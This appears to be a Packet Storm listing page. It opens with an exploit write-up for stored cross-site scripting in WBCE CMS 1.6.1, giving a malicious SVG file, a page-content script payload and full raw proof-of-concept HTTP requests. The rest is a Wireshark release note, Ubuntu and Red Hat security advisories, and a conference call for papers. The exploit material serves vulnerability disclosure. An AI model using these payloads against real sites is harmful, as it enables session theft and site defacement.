WBCE CMS version 1.6.1 suffers from a cross site scripting vulnerability.

    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)Version: 1.6.1Bugs:  XSSTechnology: PHPVendor URL: https://wbce-cms.org/Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1Date of found: 03-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1Host: localhostContent-Length: 976sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-platform: "Linux"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtOAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167Connection: close------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="reqid"187de34ea92ac------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="cmd"upload------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="target"l1_Lw------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="mtime[]"1683056102------WebKitFormBoundary5u4r3pOGl4EnuBtO--3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)========================================================================================================================###XSS-2###1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)2. add page3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3Epoc request:POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1Host: localhostContent-Length: 143Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475Connection: closepage_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

WBCE CMS 1.6.1 Cross Site Scripting

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Wireshark Analyzer 4.0.6

Ubuntu Security Notice 6108-1 - It was discovered that Jhead did not properly handle certain crafted images while rotating them. An attacker could possibly use this issue to crash Jhead, resulting in a denial of service. Kyle Brown discovered that Jhead did not properly handle certain crafted images while regenerating the Exif thumbnail. An attacker could possibly use this issue to execute arbitrary commands.

==========================================================================  
Ubuntu Security Notice USN-6108-1  
May 25, 2023

Jhead vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Jhead could be made to crash or run programs as your login if it  
opened a specially crafted file.

Software Description:  
- jhead: Manipulate the non-image part of Exif compliant JPEG files

Details:

It was discovered that Jhead did not properly handle certain crafted images  
while rotating them. An attacker could possibly use this issue to crash Jhead,  
resulting in a denial of service. (CVE-2021-34055)

Kyle Brown discovered that Jhead did not properly handle certain crafted  
images while regenerating the Exif thumbnail. An attacker could possibly use  
this issue to execute arbitrary commands. (CVE-2022-41751)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   jhead                           1:3.06.0.1-2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   jhead                           1:3.06.0.1-2ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   jhead                           1:3.04-1ubuntu0.2

Ubuntu 18.04 LTS:  
   jhead                           1:3.00-8~ubuntu0.2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   jhead                           1:3.00-4+deb9u1ubuntu0.1~esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   jhead                           1:2.97-1+deb8u2ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6108-1  
   CVE-2021-34055, CVE-2022-41751

Package Information:  
   https://launchpad.net/ubuntu/+source/jhead/1:3.06.0.1-2ubuntu0.22.10.1  
   https://launchpad.net/ubuntu/+source/jhead/1:3.06.0.1-2ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/jhead/1:3.04-1ubuntu0.2  
   https://launchpad.net/ubuntu/+source/jhead/1:3.00-8~ubuntu0.2

Ubuntu Security Notice USN-6108-1

Ubuntu Security Notice 6106-1 - It was discovered that calamares-settings-ubuntu allowed creating the first user with a blank password, contrary to expectations.

    ==========================================================================Ubuntu Security Notice USN-6106-1May 24, 2023calamares-settings-ubuntu vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to expose sensitive information.Software Description:- calamares-settings-ubuntu: Lubuntu Calamares Settings and BrandingDetails:It was discovered that calamares-settings-ubuntu allowed creating the firstuser with a blank password, contrary to expectations.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   calamares-settings-ubuntu-common  1:22.04.4.3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6106-1   https://launchpad.net/bugs/2016436Package Information:   https://launchpad.net/ubuntu/+source/calamares-settings-ubuntu/1:22.04.4.3

Ubuntu Security Notice USN-6106-1

The Call For Papers for nullcon Goa 2023 is now open. Nullcon is an information security conference held in Goa, India. The focus of the conference is to showcase the next generation of offensive and defensive security technology. It will take place September 23rd through the 24th, 2023 at the Birla Institute of Technology and Science (BITS) Pilani, Goa.

*Conference Name: *Nullcon Goa 2023

*Important Dates:*  
*CFP Deadline: *10th July 2023  
*Conference Dates: *23rd-24th September 2023

*Venue: *Birla Institute of Technology and Science (BITS) Pilani, Goa  
*Website Link: *https://nullcon.net/goa-2023/cfp/

Share your research findings with the infosec community by becoming a  
speaker!

Welcome to the 14th Edition of Nullcon Goa, our objective is to find  
potential speakers that can showcase the next generation of offensive and  
defensive technology. Nullcon welcomes researchers and hackers around the  
world working on the 'Next Big Thing' to become a speaker via Call For  
Papers.

*Research Submission Categories:*

1.* New Research: *A research topic that has not been presented/published  
or is not going to be presented/published before Nullcon Goa 2023.

2. *Current Research: *A research topic that has already been  
presented/published partly or wholly before Nullcon Goa 2023.

3. *Desi Jugaad: *It is a Hindi word for "Local Hacks." This category is  
dedicated to hackers who find innovative tech/non-tech solutions for  
real-life challenges.

*Speaker Benefits: *https://nullcon.net/goa-2023/cfp/

Our motto being “The Next Security Thing,” below mentioned are a few  
suggested topics (but not limited to) for your reference:

IoT | Web | Web 3 | SDN | Radio | Cloud | Mobile | Telecom | Satellites |  
Networks | Forensics | Hardware | Cryptography | ICS/SCADA | Smart Cities

Reach out to cfp@nullcon.net for any further questions. Thank you!

nullcon Goa 2023 Call For Papers

Red Hat Security Advisory 2023-3299-01 - Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron. Issues addressed include bypass, cross site scripting, denial of service, deserialization, improper authorization, and information leakage vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: jenkins and jenkins-2-plugins security update  
Advisory ID:       RHSA-2023:3299-01  
Product:           OpenShift Developer Tools and Services  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3299  
Issue date:        2023-05-24  
CVE Names:         CVE-2020-7692 CVE-2021-4178 CVE-2021-46877   
                   CVE-2022-22978 CVE-2022-40151 CVE-2022-40152   
                   CVE-2022-42889 CVE-2023-24422 CVE-2023-24998   
                   CVE-2023-25761 CVE-2023-25762 CVE-2023-27900   
                   CVE-2023-27901 CVE-2023-27902 CVE-2023-27904   
=====================================================================

1. Summary:

An update for jenkins and jenkins-2-plugins is now available for OpenShift  
Developer Tools and Services for OCP 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

OpenShift Developer Tools and Services for OCP 4.13 for RHEL 8 - noarch

3. Description:

Jenkins is a continuous integration server that monitors executions of  
repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* google-oauth-client: missing PKCE support in accordance with the RFC for  
OAuth 2.0 for Native Apps can lead to improper authorization  
(CVE-2020-7692)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script  
Security Plugin (CVE-2023-24422)

* kubernetes-client: Insecure deserialization in unmarshalYaml method  
(CVE-2021-4178)

* jackson-databind: Possible DoS if using JDK serialization to serialize  
JsonNode (CVE-2021-46877)

* springframework: Authorization Bypass in RegexRequestMatcher  
(CVE-2022-22978)

* xstream: Xstream to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40151)

* woodstox-core: woodstox to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40152)

* Apache Commons FileUpload: FileUpload DoS with excessive parts  
(CVE-2023-24998)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin  
(CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in  
Pipeline: Build Step Plugin (CVE-2023-25762)

* Jenkins: Denial of Service attack (CVE-2023-27900)

* Jenkins: Denial of Service attack (CVE-2023-27901)

* Jenkins: Workspace temporary directories accessible through directory  
browser (CVE-2023-27902)

* Jenkins: Information disclosure through error stack traces related to  
agents (CVE-2023-27904)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1856376 - CVE-2020-7692 google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization  
2034388 - CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method  
2087606 - CVE-2022-22978 springframework: Authorization Bypass in RegexRequestMatcher  
2134291 - CVE-2022-40152 woodstox-core: woodstox to serialise XML data was vulnerable to Denial of Service attacks  
2134292 - CVE-2022-40151 xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks  
2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2164278 - CVE-2023-24422 jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin  
2170039 - CVE-2023-25761 jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin  
2170041 - CVE-2023-25762 jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin  
2172298 - CVE-2023-24998 Apache Commons FileUpload: FileUpload DoS with excessive parts  
2177630 - CVE-2023-27902 Jenkins: Workspace temporary directories accessible through directory browser  
2177634 - CVE-2023-27904 Jenkins: Information disclosure through error stack traces related to agents  
2177638 - CVE-2023-27900 Jenkins: Denial of Service attack  
2177646 - CVE-2023-27901 Jenkins: Denial of Service attack  
2185707 - CVE-2021-46877 jackson-databind: Possible DoS if using JDK serialization to serialize JsonNode

6. JIRA issues fixed (https://issues.jboss.org/):

PITEAM-10 - Release 4.13 Jenkins agent image  
PITEAM-9 - Release 4.13 Jenkins image

7. Package List:

OpenShift Developer Tools and Services for OCP 4.13 for RHEL 8:

Source:  
jenkins-2-plugins-4.13.1684911916-1.el8.src.rpm  
jenkins-2.387.3.1684911776-3.el8.src.rpm

noarch:  
jenkins-2-plugins-4.13.1684911916-1.el8.noarch.rpm  
jenkins-2.387.3.1684911776-3.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2020-7692  
https://access.redhat.com/security/cve/CVE-2021-4178  
https://access.redhat.com/security/cve/CVE-2021-46877  
https://access.redhat.com/security/cve/CVE-2022-22978  
https://access.redhat.com/security/cve/CVE-2022-40151  
https://access.redhat.com/security/cve/CVE-2022-40152  
https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/cve/CVE-2023-24422  
https://access.redhat.com/security/cve/CVE-2023-24998  
https://access.redhat.com/security/cve/CVE-2023-25761  
https://access.redhat.com/security/cve/CVE-2023-25762  
https://access.redhat.com/security/cve/CVE-2023-27900  
https://access.redhat.com/security/cve/CVE-2023-27901  
https://access.redhat.com/security/cve/CVE-2023-27902  
https://access.redhat.com/security/cve/CVE-2023-27904  
https://access.redhat.com/security/updates/classification/#important

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG5wWtzjgjWX9erEAQgFsg//YzF69fxifzUFd9jVJhsxmyAL5XcwVzke  
0UWcIUOW50zakKhNb+2ka6V3wCt+PlLHhHheEAR0UqMdQ0JcdGMU+Er1P8IKB0Tu  
LdKoOBCgFdJ6aPpDD7dBMZaCd8pSYkqF/MVfFOoJKvH36M6AJKlAxSwWofGG3vI7  
312EM3Mj2NFF79y3/EIKPjVRlz1pVYmXUtGNVe5R1+gXDbgyEv/e9w4pgUowxjTH  
KDFSsz4WVJJGj+GGWlKtI2JkfTGjGVcyEDZsFD+ppQbRJW/EBJtXXXKp30vu41WK  
s7Uw8rYJybFhvxdfHeOlchK++ep4NGDbCJHtB8ad45qckKpfHPPLQtvWX2VJw8YD  
8Eej7F5mU7CzCD9vBdGuSFjXLPaJnQ9RBAgCO0dmT6zaFr2QJXyYR2qZLMKpL2JZ  
TP+Rx4cbPYD7WsFGEWiVBdPQHKVaghfda/7XO5Nk5g8KWZ55LwSYu5tJo/rQvNWS  
mAOk2B651gX3EvXzidlwPIhf0BVICxdfdDzq15bXINQtFvd8IN79Bn//vYa5yCZQ  
dO2qEc9nXIuObgjRgPeLs32qHsVP2FCiLbSq1RsT8S7PUQa/p7SZ+epq6c/HFnoT  
kO9UTUrJyXHL+4RKtlI6yyupuL0UfN0q44ewyzHPm2F7h+mnZVelTfUT9JFgFgnE  
Br5rCa9tQGQ=  
=/O17  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3299-01

Ubuntu Security Notice 6105-1 - The ca-certificates package contained outdated CA certificates. This update refreshes the included certificates to those contained in the 2.60 version of the Mozilla certificate authority bundle.

==========================================================================  
Ubuntu Security Notice USN-6105-1  
May 24, 2023

ca-certificates update  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

The CA certificates in the ca-certificates package were updated.

Software Description:  
- ca-certificates: Common CA certificates

Details:

The ca-certificates package contained outdated CA certificates. This update  
refreshes the included certificates to those contained in the 2.60 version  
of the Mozilla certificate authority bundle.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   ca-certificates                 20230311ubuntu0.23.04.1

Ubuntu 22.10:  
   ca-certificates                 20230311ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   ca-certificates                 20230311ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   ca-certificates                 20230311ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
   ca-certificates                 20230311ubuntu0.18.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6105-1  
   https://launchpad.net/bugs/2020089

Package Information:  
   https://launchpad.net/ubuntu/+source/ca-certificates/20230311ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/ca-certificates/20230311ubuntu0.22.10.1  
   https://launchpad.net/ubuntu/+source/ca-certificates/20230311ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/ca-certificates/20230311ubuntu0.20.04.1  
   https://launchpad.net/ubuntu/+source/ca-certificates/20230311ubuntu0.18.04.1

Ubuntu Security Notice USN-6105-1

Ubuntu Security Notice 6105-2 - USN-6105-1 updated ca-certificates. This provides the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. The ca-certificates package contained outdated CA certificates. This update refreshes the included certificates to those contained in the 2.60 version of the Mozilla certificate authority bundle.

==========================================================================  
Ubuntu Security Notice USN-6105-2  
May 24, 2023

ca-certificates update  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

The CA certificates in the ca-certificates package were updated.

Software Description:  
- ca-certificates: Common CA certificates

Details:

USN-6105-1 updated ca-certificates. This provides  
the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.

Original advisory details:

 The ca-certificates package contained outdated CA certificates. This update  
 refreshes the included certificates to those contained in the 2.60 version  
 of the Mozilla certificate authority bundle.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  ca-certificates                 20230311~16.04.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  ca-certificates                 20230311~14.04.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6105-2  
  https://ubuntu.com/security/notices/USN-6105-1  
  https://launchpad.net/bugs/

Ubuntu Security Notice USN-6105-2

Red Hat Security Advisory 2023-3318-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. The golang packages provide the Go programming language compiler.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset and golang security update  
Advisory ID:       RHSA-2023:3318-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3318  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24540   
=====================================================================

1. Summary:

An update for go-toolset and golang is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

The golang packages provide the Go programming language compiler.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
go-toolset-1.19.9-1.el9_2.src.rpm  
golang-1.19.9-2.el9_2.src.rpm

aarch64:  
go-toolset-1.19.9-1.el9_2.aarch64.rpm  
golang-1.19.9-2.el9_2.aarch64.rpm  
golang-bin-1.19.9-2.el9_2.aarch64.rpm

noarch:  
golang-docs-1.19.9-2.el9_2.noarch.rpm  
golang-misc-1.19.9-2.el9_2.noarch.rpm  
golang-src-1.19.9-2.el9_2.noarch.rpm  
golang-tests-1.19.9-2.el9_2.noarch.rpm

ppc64le:  
go-toolset-1.19.9-1.el9_2.ppc64le.rpm  
golang-1.19.9-2.el9_2.ppc64le.rpm  
golang-bin-1.19.9-2.el9_2.ppc64le.rpm

s390x:  
go-toolset-1.19.9-1.el9_2.s390x.rpm  
golang-1.19.9-2.el9_2.s390x.rpm  
golang-bin-1.19.9-2.el9_2.s390x.rpm

x86_64:  
go-toolset-1.19.9-1.el9_2.x86_64.rpm  
golang-1.19.9-2.el9_2.x86_64.rpm  
golang-bin-1.19.9-2.el9_2.x86_64.rpm  
golang-race-1.19.9-2.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG8Y5dzjgjWX9erEAQhgIA//WztjelwUEEFOAg/b2O92p7LrvnckbT4Q  
nUc4jPJrZpK67BJj7kYIr78aifrDVWU3PEIgeVamQ0yyxno5AvlPL/o8jzGkwjZS  
QgX9VIeeDbFJHykcu0MzoMNvPNLgCSooakR1QrN71MdjgEOTTR7frNLC0sQMIOAD  
OqDy+KHgMKMRFhClIfZLoRlFCqwjrClDrIz/lCsbm16fAX4FJubVzq2lKO+m1kJ0  
CfZDcFE5BKSR2jR7VfW74jGQkk61/cSU8ALktggCGwylPTeu6lzqi61Qnhldq+oF  
sgltURPdF20vvcxEuPakjmJ/9qVl1AnKnVc+RMrWZ8tCkoZk89IVGMJtcNmy1fjW  
ar9B3baGu7qUpaK3Pr7dsWJCk3k4Ws3rCVgXErjWTYooYQY86LHDY60r9A6iugZf  
fjSCa2eFSnQlw4e7cBlgPU5DdRSMOKWwGiIUUBpfFoezdrF1z3o+aRaXpw7tIfTH  
eKsM9uGPPAjoRFxu9HizwqMHFAzGUfVsM5XFphvr5MPFoP/TA11A93ZVi1hsfwem  
Kiu4OPGfp+eOWAzkAuWe8SXBEuXYnttqM1a9VD+JaJQo+4j+k7alqx/sVnWgZg0Q  
OAhpYcfOUGNwPGyZmT1zN7VQ5DSvMoFMON2r47A+FaixTxah500vnUMVSAHtJQO6  
cLOqPg1aA58=  
=eGi1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3318-01

Ubuntu Security Notice 6100-1 - It was discovered that HTML::StripScripts does not properly parse HTML content with certain style attributes. A remote attacker could use this issue to cause a regular expression denial of service.

==========================================================================  
Ubuntu Security Notice USN-6100-1  
May 23, 2023

libhtml-stripscripts-perl vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

HTML::StripScripts could be made to crash if it received specially crafted  
input.

Software Description:  
- libhtml-stripscripts-perl: module for removing scripts from HTML

Details:

It was discovered that HTML::StripScripts does not properly parse HTML  
content with certain style attributes. A remote attacker could use this issue  
to cause a regular expression denial of service (ReDoS).

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  libhtml-stripscripts-perl       1.06-2ubuntu0.1

Ubuntu 22.04 LTS:  
  libhtml-stripscripts-perl       1.06-1ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  libhtml-stripscripts-perl       1.06-1ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  libhtml-stripscripts-perl       1.06-1ubuntu0.18.04.1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  libhtml-stripscripts-perl       1.05-2ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  libhtml-stripscripts-perl       1.05-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6100-1  
  CVE-2023-24038

Package Information:  
  https://launchpad.net/ubuntu/+source/libhtml-stripscripts-perl/1.06-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libhtml-stripscripts-perl/1.06-1ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/libhtml-stripscripts-perl/1.06-1ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/libhtml-stripscripts-perl/1.06-1ubuntu0.18.04.1

Source

Packet Storm